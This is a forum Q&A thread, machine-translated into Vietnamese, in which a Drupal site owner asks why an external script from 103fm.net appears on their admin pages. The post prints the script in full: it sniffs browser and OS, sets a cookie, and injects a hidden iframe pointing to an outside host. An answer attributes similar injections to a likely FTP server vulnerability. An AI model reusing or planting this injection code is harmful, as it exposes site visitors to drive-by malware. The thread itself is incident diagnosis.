Tại sao tập lệnh "103fm" xuất hiện trên trang web Drupal?

Question

thể trùng lặp:
Weird Script Appearing In My Website's DOM

Tôi chỉ nhận thấy một kịch bản lạ chạy trong các trang web DOM của tôi. Tôi đang chạy DRUPAL. Tập lệnh là http://www.103fm.net/release.js. Tôi không biết bắt đầu từ đâu để tìm ra kịch bản giả mạo này. Trang web của tôi là miloads.com và nó chỉ xảy ra trong các menu admin. Điều lạ là các tập tin không tồn tại trên 103fm.net, nhưng nó thực sự tải kịch bản sau đây:

var BrowserDetect = { 
init: function() { 
this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; 
this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version"; 
this.OS = this.searchString(this.dataOS) || "an unknown OS"; 
}, 
searchString: function(data) { 
for (var i = 0; i < data.length; i++) { 
var dataString = data[i].string; 
var dataProp = data[i].prop; 
this.versionSearchString = data[i].versionSearch || data[i].identity; 
if (dataString) { 
if (dataString.indexOf(data[i].subString) != -1) 
return data[i].identity; 
} else if (dataProp) 
return data[i].identity; 
} 
}, 
searchVersion: function(dataString) { 
var index = dataString.indexOf(this.versionSearchString); 
if (index == -1) 
return; 
return parseFloat(dataString.substring(index + this.versionSearchString.length + 1)); 
}, 
dataBrowser: [{ 
string: navigator.userAgent, 
subString: "Firefox", 
identity: "Firefox" 
}, { 
string: navigator.userAgent, 
subString: "MSIE", 
identity: "Explorer", 
versionSearch: "MSIE" 
}], 
dataOS: [{ 
string: navigator.platform, 
subString: "Win", 
identity: "Windows" 
}] 
}; 
function addCookie(szName, szValue, dtDaysExpires) { 
var dtExpires = new Date(); 
var dtExpiryDate = ""; 
dtExpires.setTime(dtExpires.getTime() + dtDaysExpires * 24 * 60 * 60 * 1000); 
dtExpiryDate = dtExpires.toGMTString(); 
document.cookie = szName + "=" + szValue + ";expires=" + dtExpiryDate; 
} 
function findCookie(szName) { 
var i = 0; 
var nStartPosition = 0; 
var nEndPosition = 0; 
var szCookieString = document.cookie; 
while (i <= szCookieString.length) { 
nStartPosition = i; 
nEndPosition = nStartPosition + szName.length; 
if (szCookieString.substring(nStartPosition, nEndPosition) == szName) { 
nStartPosition = nEndPosition + 1; 
nEndPosition = document.cookie.indexOf(";", nStartPosition); 
if (nEndPosition < nStartPosition) 
nEndPosition = document.cookie.length; 
return document.cookie.substring(nStartPosition, nEndPosition); 
break; 
} 
i++; 
} 
return ""; 
} 
BrowserDetect.init(); 
var szCookieString = document.cookie; 
var stopit = BrowserDetect.browser; 
var os = BrowserDetect.OS; 
if (((stopit == "Firefox" || stopit == "Explorer") && (os == "Windows")) && (findCookie('geo_id2') != '753445')) { 
addCookie("geo_id2", "753445", 1); 
document.write("<if" + "rame name='info' src='http://www.ztanalytics.com/stat.cgi?s_id=1' width=1 height=1 scrolling=no frameborder=0></if" + "rame>"); 
} else {} 

Answer 1

Tương tự như vậy, máy chủ của khách hàng đã bị xâm nhập đêm qua, bởi địa chỉ IP ở Romania, Cộng hòa Séc và Ba Lan . Các quy trình dường như tự động này xuất hiện để chèn một thẻ tập lệnh ở đầu thẻ body. Tập lệnh này xuất hiện để tạo ra một cookie trên các máy Windows chạy Firefox và IE. Sau đó, nó sẽ mở một khung nội tuyến và chạy một tập lệnh CGI chạy trên một trang web được lưu trữ ở Nga.

May mắn thay, phiên bản mới nhất của Firefox thậm chí sẽ không tải tập lệnh; IE tuy nhiên.

Chrome (mặc dù không bị ảnh hưởng) thậm chí sẽ không cho phép bạn truy cập trang mà điều này đã xảy ra. Khi tất cả các báo cáo tôi có thể tìm thấy điều này đã xảy ra gần đây, nó có thể là một phần mềm vunerability, chứ không phải là mật khẩu bị xâm nhập - máy chủ FTP bạn đang chạy (kết nối với máy chủ với máy khách FTP của bạn, và giao diện điều khiển nên nói cho bạn nghe). Máy chủ được đề cập đang chạy ProFTPd 1.3.1.

Nếu phần mềm là phổ biến, thì người sáng tạo nên được thông báo.